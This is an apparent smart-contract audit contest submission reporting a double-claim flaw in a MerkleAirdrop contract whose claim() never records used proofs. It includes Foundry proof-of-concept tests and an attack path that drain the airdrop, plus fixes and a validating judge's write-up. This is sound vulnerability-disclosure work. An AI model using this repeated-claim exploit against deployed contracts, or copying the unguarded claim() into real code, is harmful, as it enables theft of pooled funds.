AirDropper

AI First Flight #5

Beginner FriendlyDeFiFoundry

EXP

View results

Submission Details

Severity: high

Valid

Double-Claim Vulnerability in MerkleAirdrop

firmanregar

Root + Impact

Description

The MerkleAirdrop contract allows users to claim their airdrop allocation multiple times using the same Merkle proof. There is no on-chain state tracking which leaves have been claimed, enabling complete drainage of the airdrop funds.

Root cause: The claim() function verifies the Merkle proof but never marks the leaf as consumed.

function claim(address account, uint256 amount, bytes32[] calldata merkleProof) external payable {

if (msg.value != FEE) {

revert MerkleAirdrop__InvalidFeeAmount();

}

bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(account, amount))));

if (!MerkleProof.verify(merkleProof, i_merkleRoot, leaf)) {

revert MerkleAirdrop__InvalidProof();

}

emit Claimed(account, amount);

i_airdropToken.safeTransfer(account, amount);

}

Risk

Likelihood:

After a successful claim, the contract state is unchanged - no mapping update, no bitmap modification, no nonce increment. The same (account, amount, merkleProof) tuple will verify successfully on subsequent calls.

Impact:

Direct impact:
- Complete loss of airdrop funds (100 USDC)
- Legitimate users unable to claim their allocation
Secondary effects:
- No recovery mechanism exists (no pause, no admin withdrawal)
- Contract becomes permanently insolvent
- Claimed events misleadingly suggest fair distribution occurred

Proof of Concept

function test_doubleClaim() public {

// Setup: fund airdrop, prepare attacker

deal(address(usdc), address(airdrop), 100e6);

vm.deal(attacker, 1 ether);

// First claim succeeds

vm.prank(attacker);

airdrop.claim{value: 1e9}(attacker, 25e6, validProof);

assertEq(usdc.balanceOf(attacker), 25e6);

// Second claim with identical parameters also succeeds

vm.prank(attacker);

airdrop.claim{value: 1e9}(attacker, 25e6, validProof);

assertEq(usdc.balanceOf(attacker), 50e6); // Double the intended amount

assertEq(usdc.balanceOf(address(airdrop)), 50e6); // Pool half-drained

}

Attack path:

Attacker calls claim(account, 25e6, proof) with 1e9 wei fee
Merkle proof verifies, 25 USDC transferred
Attacker calls claim(account, 25e6, proof) again with same parameters
Proof still verifies (root hasn't changed, leaf is identical)
Another 25 USDC transferred
Repeat until contract is drained

Economic feasibility:

Fee per claim: 1e9 wei (~$0.000003 at current ETH prices)
Tokens per claim: 25 USDC
Total airdrop: 100 USDC
Drain cost: 4 × 1e9 wei = ~$0.000012

Recommended Mitigation

Add claim tracking using a mapping:

mapping(bytes32 => bool) private claimed;

function claim(address account, uint256 amount, bytes32[] calldata merkleProof) external payable {

if (msg.value != FEE) {

revert MerkleAirdrop__InvalidFeeAmount();

}

bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(account, amount))));

if (claimed[leaf]) {

revert MerkleAirdrop__AlreadyClaimed();

}

if (!MerkleProof.verify(merkleProof, i_merkleRoot, leaf)) {

revert MerkleAirdrop__InvalidProof();

}

claimed[leaf] = true;

emit Claimed(account, amount);

i_airdropToken.safeTransfer(account, amount);

}

For gas optimization with many eligible addresses, consider using a bitmap pattern similar to the Uniswap Merkle Distributor this contract is based on.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 2 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-02] Eligible users can claim their airdrop amounts over and over again, draining the contract

## Description A user eligible for the airdrop can verify themselves as being part of the merkle tree and claim their airdrop amount. However, there is no mechanism enabled to track the users who have already claimed their airdrop, and the merkle tree is still composed of the same user. This allows users to drain the `MerkleAirdrop` contract by calling the `MerkleAirdrop::claim()` function over and over again. ## Impact **Severity: High**<br/>**Likelihood: High** A malicious user can call the `MerkleAirdrop::claim()` function over and over again until the contract is drained of all its funds. This also means that other users won't be able to claim their airdrop amounts. ## Proof of Code Add the following test to `./test/MerkleAirdrop.t.sol`, ```javascript function testClaimAirdropOverAndOverAgain() public { vm.deal(collectorOne, airdrop.getFee() * 4); for (uint8 i = 0; i < 4; i++) { vm.prank(collectorOne); airdrop.claim{ value: airdrop.getFee() }(collectorOne, amountToCollect, proof); } assertEq(token.balanceOf(collectorOne), 100e6); } ``` The test passes, and the malicious user has drained the contract of all its funds. ## Recommended Mitigation Use a mapping to store the addresses that have claimed their airdrop amounts. Check and update this mapping each time a user tries to claim their airdrop amount. ```diff contract MerkleAirdrop is Ownable { using SafeERC20 for IERC20; error MerkleAirdrop__InvalidFeeAmount(); error MerkleAirdrop__InvalidProof(); error MerkleAirdrop__TransferFailed(); + error MerkleAirdrop__AlreadyClaimed(); uint256 private constant FEE = 1e9; IERC20 private immutable i_airdropToken; bytes32 private immutable i_merkleRoot; + mapping(address user => bool claimed) private s_hasClaimed; ... function claim(address account, uint256 amount, bytes32[] calldata merkleProof) external payable { + if (s_hasClaimed[account]) revert MerkleAirdrop__AlreadyClaimed(); if (msg.value != FEE) { revert MerkleAirdrop__InvalidFeeAmount(); } bytes32 leaf = keccak256(bytes.concat(keccak256(abi.encode(account, amount)))); if (!MerkleProof.verify(merkleProof, i_merkleRoot, leaf)) { revert MerkleAirdrop__InvalidProof(); } + s_hasClaimed[account] = true; emit Claimed(account, amount); i_airdropToken.safeTransfer(account, amount); } ``` Now, let's unit test the changes, ```javascript function testCannotClaimAirdropMoreThanOnceAnymore() public { vm.deal(collectorOne, airdrop.getFee() * 2); vm.prank(collectorOne); airdrop.claim{ value: airdrop.getFee() }(collectorOne, amountToCollect, proof); vm.prank(collectorOne); airdrop.claim{ value: airdrop.getFee() }(collectorOne, amountToCollect, proof); } ``` The test correctly fails, with the following logs, ```shell Failing tests: Encountered 1 failing test in test/MerkleAirdropTest.t.sol:MerkleAirdropTest [FAIL. Reason: MerkleAirdrop__AlreadyClaimed()] testCannotClaimAirdropMoreThanOnceAnymore() (gas: 96751) ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!